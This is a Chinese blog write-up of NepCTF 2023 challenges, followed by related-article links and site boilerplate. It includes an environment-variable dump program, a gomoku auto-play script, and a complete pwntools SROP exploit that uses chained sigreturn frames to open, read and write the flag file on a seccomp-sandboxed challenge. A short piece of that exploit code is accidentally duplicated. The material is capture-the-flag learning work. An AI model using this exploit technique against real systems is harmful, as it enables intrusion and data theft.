NepCTF 2023

最新推荐文章于 2024-11-08 17:56:00 发布
最新推荐文章于 2024-11-08 17:56:00 发布
阅读量381 收藏 3
点赞数 5
分类专栏: PWN题目记录 文章标签: 经验分享 linux 网络安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72981769/article/details/141086858
版权

NepCTF 2023

为什么开赛两分钟选择不打了?
答案很简单:签到题格式打错了…运营姐姐没回我…48h…
炮灰pwn不会做!!!(其实可以做misc)

Msic

code

题目提示flag在环境变量中 开始STFW
https://blog.csdn.net/aspnet_lyc/article/details/20548767

#include <stdio.h>
 
int main(int argc, char** argv, char** arge)
{
	while(*arge)
	{
		printf("%s\n", *arge++);
	}
	return 0;
}

image-20230814162812545

与AI共舞的哈夫曼

求助chat因为不会用copilot

ConnectedFive

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

五子棋 不会写脚本干下吧hh(求助chat也不是不行)

from pwn import *
import random
r = remote('nepctf.1cepeak.cn', 31762)
def getboard():
    board = []
    for i in range(15):
        data = r.recvline().decode()[3:].replace('[', ' ').replace(']', ' ').strip()
        data = data.split(' ')
        board.append(data)
    return board
table = 'abcdefghijklmno'
while True:
    r.recvline()
    r.recvline()
    r.recvline()
    r.recvline()
    res = r.recvline().decode()
    if(int(res.split(':')[0]) >= 38):
        r.interactive()
    print(res)
    r.recvline()
    r.recvline()
    board = getboard()
    random_x = random.randint(0, 14)
    random_y = random.randint(0, 14)
    while board[random_y][random_x] != '.':
        random_x = random.randint(0, 14)
        random_y = random.randint(0, 14)
    pos = table[random_x] + table[random_y]
    r.recvline()
    r.sendline(pos)
    r.recvline()
陌生的语言

根据提示A同学 开始bing 结果 竟然 看过 (我有罪)

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

PWN复现

不是我说 是真不会但是跟着复现cve 从中学到了很多

srop

题目提示classic pwn

先seccomp-tools查看是否有沙盒
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

really exist!
有沙盒,只能使用open,read,write函数. goto 0009中0009是return ALLOW说明允许执行.
若为goto 00010则被禁用.

image-20230816104100112

​ 注意是call syscall函数而不是直接syscall 所以寄存器会有偏移

from pwn import *
io = remote("nepctf.1cepeak.cn",30307)
libc = ELF("./libc-2.27.so")
elf = ELF("./pwn")
context.log_level = 'debug'
context.arch = "amd64"

io.recvuntil("welcome to NepCTF2023!")
pop_rdi = 0x0000000000400813
syscall = 0x4005B0
bss_addr = elf.bss(0x500)
read_function = SigreturnFrame()
read_function.rdi = 0
read_function.rsi = 0
read_function.rdx = bss_addr-0x8
read_function.rcx = 0x500
read_function.rip = syscall
read_function.rsp = bss_addr

payload = cyclic(0x38)+p64(pop_rdi)+p64(0xf)+p64(syscall)+bytes(read_function)
io.send(payload)

open = SigreturnFrame()
open.rdi = 2
open.rsi = bss_addr-0x8
open.rdx = 0
open.rcx = 0
open.rip = syscall
open.rsp = bss_addr + 0x110

read_function = SigreturnFrame()
read_function.rdi = 0
read_function.rsi = 3
read_function.rdx = bss_addr - 0x200
read_function.rcx = 0x100
read_function.rip = syscall
read_function.rsp = bss_addr + 0x220

write_funtion = SigreturnFrame()
write_funtion.rdi = 1
write_funtion.rsi = 1
write_funtion.rdx = bss_addr - 0x200
write_funtion.rcx = 0x100
write_funtion.rip = syscall
write_funtion.rsp = bss_addr+0x30

payload = b'./flag\x00\x00'+p64(pop_rdi)+p64(0xf)+p64(syscall)+bytes(open)
payload = payload.ljust(0x108,b'\x00')+p64(pop_rdi)+p64(0xf)+p64(syscall)+bytes(read_function)
payload = payload.ljust(0x208,b'\x00')+p64(pop_rdi)+p64(0xf)+p64(syscall)+bytes(write_funtion)
io.send(payload)

io.recv()
io.recv()

)+bytes(read_function)
payload = payload.ljust(0x208,b’\x00’)+p64(pop_rdi)+p64(0xf)+p64(syscall)+bytes(write_funtion)
io.send(payload)

io.recv()
io.recv()


Nepctf{SROP_IT_IS_EAsY_6ee3e57b-3982-4924-844a-d362c3006b20}
Nepctf 2023学习
weixin_47063945的博客
08-19 335
太过浮躁,没办法沉下心来做题,可以先从ak人数多的题目入手要尽力去做题,这样赛后复盘才能学到东西第一次接触misc,misc方向确实需要一点脑洞。
NepCTF2023--部分wp
qing_chuan_的博客
08-14 474
下载拿到piano.bin,是个音频文件,拉进Audacity看一下,发现有频谱,通过放大缩小频谱发现有字符串,将字符串抄写下来,钱一部分是摩斯密码,后部分是16进制。去搜Atsuko Kagari”,发现为小魔女学园动漫女主角,去看了动漫,发现里面有着文字,新月文字和古龙语,去上网找解释。这道题就是个游戏,就是自己和机器人下棋,你自己先先连出来42和5子棋就可得到flag,不想在复现一遍了。题目说是一种很老的cve,题目又是java-checkin,上网搜,找到一个跟java有关得cve。
NepCTF2023】复现
leekos的博客,分享web安全相关知识~
08-16 5079
复现完这题学到了很多关于内网中代理等知识,学到了venom工具构造socks5代理,使用proxifier的方式打开工具,有点像给系统加了一个代理。
NepCTF2023-misc方向wp
toto的博客
08-14 913
(伸出脑袋,凑近群名,轻轻的闻了一下)哇,好咸诶,开拓者你快来看看!Nepnep星球如约举办CTF大赛,消息传播至各大星球,开拓者一行人应邀而来 ———————————————————————————————————————开拓者(U_id):(端着下巴,磨蹭了一下,眼神若有所思)这好像需要经过啥256处理一下才能得到我们需要的关键。然后16个一组画图,这时候画出来的图有一定的偏移,开头再添加5个6画的就很好了。限时10分钟,玩到42分就好了,直接手动玩就行了,电脑方挺笨的,没啥考点可言。
nepctf2023 部分web复现
weixin_63231007的博客
09-01 1020
我们需要写一个plugin进去,但是不能直接写进去,因为plugin目录没权限写但是由于当前我们有root权限的数据库用户,我们可以使用select into dumpfile的形式写入:当以 root 用户身份执行 SELECT INTO DUMPFILE 查询时,它将绕过文件权限检查,并允许将查询结果写入任何有效的文件路径中,即使该路径对 mysql 用户是无法写入的。请注意,使用 root 用户执行此操作需要格外小心,因为它会绕过一些安全限制。
[NepCTF 2023] crypto 复现
weixin_52640415的博客
08-14 930
MT9937 z3约束求解
NepCtf2023 -srop
有头发的埼玉
08-20 123
nepctf nepctf2023 nepctf23 srop
NepCTF2023 Crypto wp
qq_41626232的博客
08-14 509
先通过类似boneh and durfee attack获得p,q,d,后面爆破一下p,q的位置,然后随机数预测就行。这个没注意到P和的线性无关条件,复杂度没降下来,也是稍微改了下原代码就出了。注意一下,要判断ABC每个数生成的环的数量,长度相等,可以筛选掉大部分值。遍历密钥空间,然后判断环是否与给定的加密结果的环相同。没做,看起来恢复一下轮密钥就出了,解的人挺多。爆一下p,q位置,后面常规的随机数预测。稍微看一下源代码就发现漏洞点吧?就用题目上这个人的攻击思路就ok。二元cop解一下就行。
NepCTF2022
Blazing-Angel的博客
07-19 1265
nepctf2022 wp
一文打通DES算法以及在ctf中的运用!【附2023NepCTF simpleDES巨细题解~】
jayq1的博客
08-19 1456
跟随文章的脚步一起到原始论文中探索DES的奥秘,同时还可以在真实的完美例题中感受DES知识的运用,文章看完,成就满满~
NepCTF比赛官方writeup1
08-04
NepCTF比赛官方writeup1
NepCTF2022-个人Writeup
m0_61596829的博客
07-17 1872
NepCTF2022-个人Writeup
DASCTF&NepCTF 部分writeup
weixin_44145820的博客
06-26 4412
目录PWNoooorderspringboardeasyheap(本地成功)RET0p GearpyCharm521MagiaMISC透明度 PWN oooorder 一道不太复杂的题目,利用点都是之前遇到的,运气好拿到了一血 edit中进行了realloc,如果size为0就会执行free,利用这个进行double free,由于禁用了execve,需要用setcontext执行mprotect并执行orw的shellcode 关于orw部分,具体请见这篇博客:BUUCTF-PWN rctf_2019_
华为云计算HCIE-Cloud Computing V3.0试验考试北京考场经验分享
最新发布
田保杰的博客
11-08 442
HCIE试验考试北京考场地点及流程
Linux下的systemd/service
zxz_Fine的博客
11-05 578
开机自启任务
linux rocky 9.4部署和管理docker harbor私有源
xikui1551的博客
11-08 779
rocky 部署Harbor私有镜像仓库
linux长时间运行任务中断报警trap
djl的专栏,blog.djl.cx好记
11-08 203
每天要运行的定时任务, 时间很长, 有一天突然被中断了, 如果能有个中断提醒就好了。sleep 命令模拟一个长时间运行的任务,并在后台运行它。wait 命令等待任务完成或被杀死,并检查。wait 命令的退出状态码来判断脚本是否被。在这个脚本中,我们使用。
linux-find和zgrep
luxideyao的专栏
11-07 302
命令本身并不支持递归搜索,它只能搜索单个压缩文件。但是,你可以结合使用。如果你想要搜索所有类型的压缩文件,你可以使用。是你想要搜索的目录的路径。是你想要搜索的文本模式,文件,你可能需要使用。文件并搜索其中的内容。作为输入文件的占位符。
welcome_CAT_CTF
07-28
- *2* *3* [NepCTF2022 WP](https://blog.csdn.net/not_code_god/article/details/125883979)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值